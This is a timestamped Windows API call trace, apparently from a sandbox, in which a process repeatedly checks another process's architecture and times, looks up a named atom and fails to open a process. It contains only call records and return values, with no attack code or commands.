	[0132.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.434] CloseHandle (hObject=0x2dc) returned 1
	[0132.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.434] CloseHandle (hObject=0x2dc) returned 1
	[0132.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.434] CloseHandle (hObject=0x2dc) returned 1
	[0132.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.468] CloseHandle (hObject=0x2dc) returned 1
	[0132.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.468] CloseHandle (hObject=0x2dc) returned 1
	[0132.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.468] CloseHandle (hObject=0x2dc) returned 1
	[0132.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.468] CloseHandle (hObject=0x2dc) returned 1
	[0132.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.469] CloseHandle (hObject=0x2dc) returned 1
	[0132.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.469] CloseHandle (hObject=0x2dc) returned 1
	[0132.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.469] CloseHandle (hObject=0x2dc) returned 1
	[0132.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.469] CloseHandle (hObject=0x2dc) returned 1
	[0132.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.470] CloseHandle (hObject=0x2dc) returned 1
	[0132.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.470] CloseHandle (hObject=0x2dc) returned 1
	[0132.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.470] CloseHandle (hObject=0x2dc) returned 1
	[0132.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.470] CloseHandle (hObject=0x2dc) returned 1
	[0132.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.471] CloseHandle (hObject=0x2dc) returned 1
	[0132.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.471] CloseHandle (hObject=0x2dc) returned 1
	[0132.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.471] CloseHandle (hObject=0x2dc) returned 1
	[0132.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.471] CloseHandle (hObject=0x2dc) returned 1
	[0132.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.472] CloseHandle (hObject=0x2dc) returned 1
	[0132.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.472] CloseHandle (hObject=0x2dc) returned 1
	[0132.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.472] CloseHandle (hObject=0x2dc) returned 1
	[0132.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.472] CloseHandle (hObject=0x2dc) returned 1
	[0132.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.473] CloseHandle (hObject=0x2dc) returned 1
	[0132.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.473] CloseHandle (hObject=0x2dc) returned 1
	[0132.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.473] CloseHandle (hObject=0x2dc) returned 1
	[0132.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.473] CloseHandle (hObject=0x2dc) returned 1
	[0132.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.474] CloseHandle (hObject=0x2dc) returned 1
	[0132.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.474] CloseHandle (hObject=0x2dc) returned 1
	[0132.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.474] CloseHandle (hObject=0x2dc) returned 1
	[0132.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.474] CloseHandle (hObject=0x2dc) returned 1
	[0132.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.474] CloseHandle (hObject=0x2dc) returned 1
	[0132.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.475] CloseHandle (hObject=0x2dc) returned 1
	[0132.475] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.475] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.475] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.476] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.476] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.476] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.476] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.476] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.476] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.476] CloseHandle (hObject=0x2dc) returned 1
	[0132.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.477] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.477] CloseHandle (hObject=0x2dc) returned 1
	[0132.477] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.477] CloseHandle (hObject=0x2dc) returned 1
	[0132.477] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.477] CloseHandle (hObject=0x2dc) returned 1
	[0132.477] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.477] CloseHandle (hObject=0x2dc) returned 1
	[0132.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.478] CloseHandle (hObject=0x2dc) returned 1
	[0132.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.510] CloseHandle (hObject=0x2dc) returned 1
	[0132.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.510] CloseHandle (hObject=0x2dc) returned 1
	[0132.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.511] CloseHandle (hObject=0x2dc) returned 1
	[0132.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.511] CloseHandle (hObject=0x2dc) returned 1
	[0132.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.511] CloseHandle (hObject=0x2dc) returned 1
	[0132.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.511] CloseHandle (hObject=0x2dc) returned 1
	[0132.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.512] CloseHandle (hObject=0x2dc) returned 1
	[0132.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.512] CloseHandle (hObject=0x2dc) returned 1
	[0132.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.512] CloseHandle (hObject=0x2dc) returned 1
	[0132.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.512] CloseHandle (hObject=0x2dc) returned 1
	[0132.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.513] CloseHandle (hObject=0x2dc) returned 1
	[0132.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.513] CloseHandle (hObject=0x2dc) returned 1
	[0132.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.513] CloseHandle (hObject=0x2dc) returned 1
	[0132.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.513] CloseHandle (hObject=0x2dc) returned 1
	[0132.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.514] CloseHandle (hObject=0x2dc) returned 1
	[0132.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.514] CloseHandle (hObject=0x2dc) returned 1
	[0132.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.514] CloseHandle (hObject=0x2dc) returned 1
	[0132.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.514] CloseHandle (hObject=0x2dc) returned 1
	[0132.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.515] CloseHandle (hObject=0x2dc) returned 1
	[0132.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.515] CloseHandle (hObject=0x2dc) returned 1
	[0132.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.515] CloseHandle (hObject=0x2dc) returned 1
	[0132.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.515] CloseHandle (hObject=0x2dc) returned 1
	[0132.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.515] CloseHandle (hObject=0x2dc) returned 1
	[0132.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.516] CloseHandle (hObject=0x2dc) returned 1
	[0132.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.516] CloseHandle (hObject=0x2dc) returned 1
	[0132.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.516] CloseHandle (hObject=0x2dc) returned 1
	[0132.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.516] CloseHandle (hObject=0x2dc) returned 1
	[0132.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.517] CloseHandle (hObject=0x2dc) returned 1
	[0132.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.517] CloseHandle (hObject=0x2dc) returned 1
	[0132.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.517] CloseHandle (hObject=0x2dc) returned 1
	[0132.517] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.518] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.518] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.518] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.518] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.518] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.519] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.519] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.519] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.519] CloseHandle (hObject=0x2dc) returned 1
	[0132.519] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.519] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.519] CloseHandle (hObject=0x2dc) returned 1
	[0132.519] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.519] CloseHandle (hObject=0x2dc) returned 1
	[0132.520] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.520] CloseHandle (hObject=0x2dc) returned 1
	[0132.520] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.520] CloseHandle (hObject=0x2dc) returned 1
	[0132.520] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.520] CloseHandle (hObject=0x2dc) returned 1
	[0132.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.553] CloseHandle (hObject=0x2dc) returned 1
	[0132.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.553] CloseHandle (hObject=0x2dc) returned 1
	[0132.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.554] CloseHandle (hObject=0x2dc) returned 1
	[0132.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.554] CloseHandle (hObject=0x2dc) returned 1
	[0132.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.554] CloseHandle (hObject=0x2dc) returned 1
	[0132.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.554] CloseHandle (hObject=0x2dc) returned 1
	[0132.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.554] CloseHandle (hObject=0x2dc) returned 1
	[0132.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.555] CloseHandle (hObject=0x2dc) returned 1
	[0132.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.555] CloseHandle (hObject=0x2dc) returned 1
	[0132.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.555] CloseHandle (hObject=0x2dc) returned 1
	[0132.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.555] CloseHandle (hObject=0x2dc) returned 1
	[0132.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.556] CloseHandle (hObject=0x2dc) returned 1
	[0132.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.556] CloseHandle (hObject=0x2dc) returned 1
	[0132.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.556] CloseHandle (hObject=0x2dc) returned 1
	[0132.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.556] CloseHandle (hObject=0x2dc) returned 1
	[0132.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.557] CloseHandle (hObject=0x2dc) returned 1
	[0132.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.557] CloseHandle (hObject=0x2dc) returned 1
	[0132.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.557] CloseHandle (hObject=0x2dc) returned 1
	[0132.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.557] CloseHandle (hObject=0x2dc) returned 1
	[0132.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.558] CloseHandle (hObject=0x2dc) returned 1
	[0132.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.558] CloseHandle (hObject=0x2dc) returned 1
	[0132.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.558] CloseHandle (hObject=0x2dc) returned 1
	[0132.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.558] CloseHandle (hObject=0x2dc) returned 1
	[0132.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.558] CloseHandle (hObject=0x2dc) returned 1
	[0132.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.559] CloseHandle (hObject=0x2dc) returned 1
	[0132.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.559] CloseHandle (hObject=0x2dc) returned 1
	[0132.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.559] CloseHandle (hObject=0x2dc) returned 1
	[0132.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.559] CloseHandle (hObject=0x2dc) returned 1
	[0132.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.560] CloseHandle (hObject=0x2dc) returned 1
	[0132.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.560] CloseHandle (hObject=0x2dc) returned 1
	[0132.560] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.560] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.561] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.561] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.561] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.561] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.562] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.562] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.562] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.562] CloseHandle (hObject=0x2dc) returned 1
	[0132.562] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.562] CloseHandle (hObject=0x2dc) returned 1
	[0132.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.562] CloseHandle (hObject=0x2dc) returned 1
	[0132.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.563] CloseHandle (hObject=0x2dc) returned 1
	[0132.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.563] CloseHandle (hObject=0x2dc) returned 1
	[0132.563] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.563] CloseHandle (hObject=0x2dc) returned 1
	[0132.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.599] CloseHandle (hObject=0x2dc) returned 1
	[0132.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.599] CloseHandle (hObject=0x2dc) returned 1
	[0132.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.599] CloseHandle (hObject=0x2dc) returned 1
	[0132.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.599] CloseHandle (hObject=0x2dc) returned 1
	[0132.599] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.599] CloseHandle (hObject=0x2dc) returned 1
	[0132.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.600] CloseHandle (hObject=0x2dc) returned 1
	[0132.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.600] CloseHandle (hObject=0x2dc) returned 1
	[0132.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.600] CloseHandle (hObject=0x2dc) returned 1
	[0132.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.600] CloseHandle (hObject=0x2dc) returned 1
	[0132.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.601] CloseHandle (hObject=0x2dc) returned 1
	[0132.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.601] CloseHandle (hObject=0x2dc) returned 1
	[0132.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.601] CloseHandle (hObject=0x2dc) returned 1
	[0132.601] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.601] CloseHandle (hObject=0x2dc) returned 1
	[0132.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.602] CloseHandle (hObject=0x2dc) returned 1
	[0132.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.602] CloseHandle (hObject=0x2dc) returned 1
	[0132.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.602] CloseHandle (hObject=0x2dc) returned 1
	[0132.602] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.602] CloseHandle (hObject=0x2dc) returned 1
	[0132.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.603] CloseHandle (hObject=0x2dc) returned 1
	[0132.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.603] CloseHandle (hObject=0x2dc) returned 1
	[0132.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.603] CloseHandle (hObject=0x2dc) returned 1
	[0132.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.603] CloseHandle (hObject=0x2dc) returned 1
	[0132.603] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.603] CloseHandle (hObject=0x2dc) returned 1
	[0132.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.604] CloseHandle (hObject=0x2dc) returned 1
	[0132.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.604] CloseHandle (hObject=0x2dc) returned 1
	[0132.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.604] CloseHandle (hObject=0x2dc) returned 1
	[0132.604] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.604] CloseHandle (hObject=0x2dc) returned 1
	[0132.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.605] CloseHandle (hObject=0x2dc) returned 1
	[0132.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.605] CloseHandle (hObject=0x2dc) returned 1
	[0132.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.605] CloseHandle (hObject=0x2dc) returned 1
	[0132.605] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.605] CloseHandle (hObject=0x2dc) returned 1
	[0132.606] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.606] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.606] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.606] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
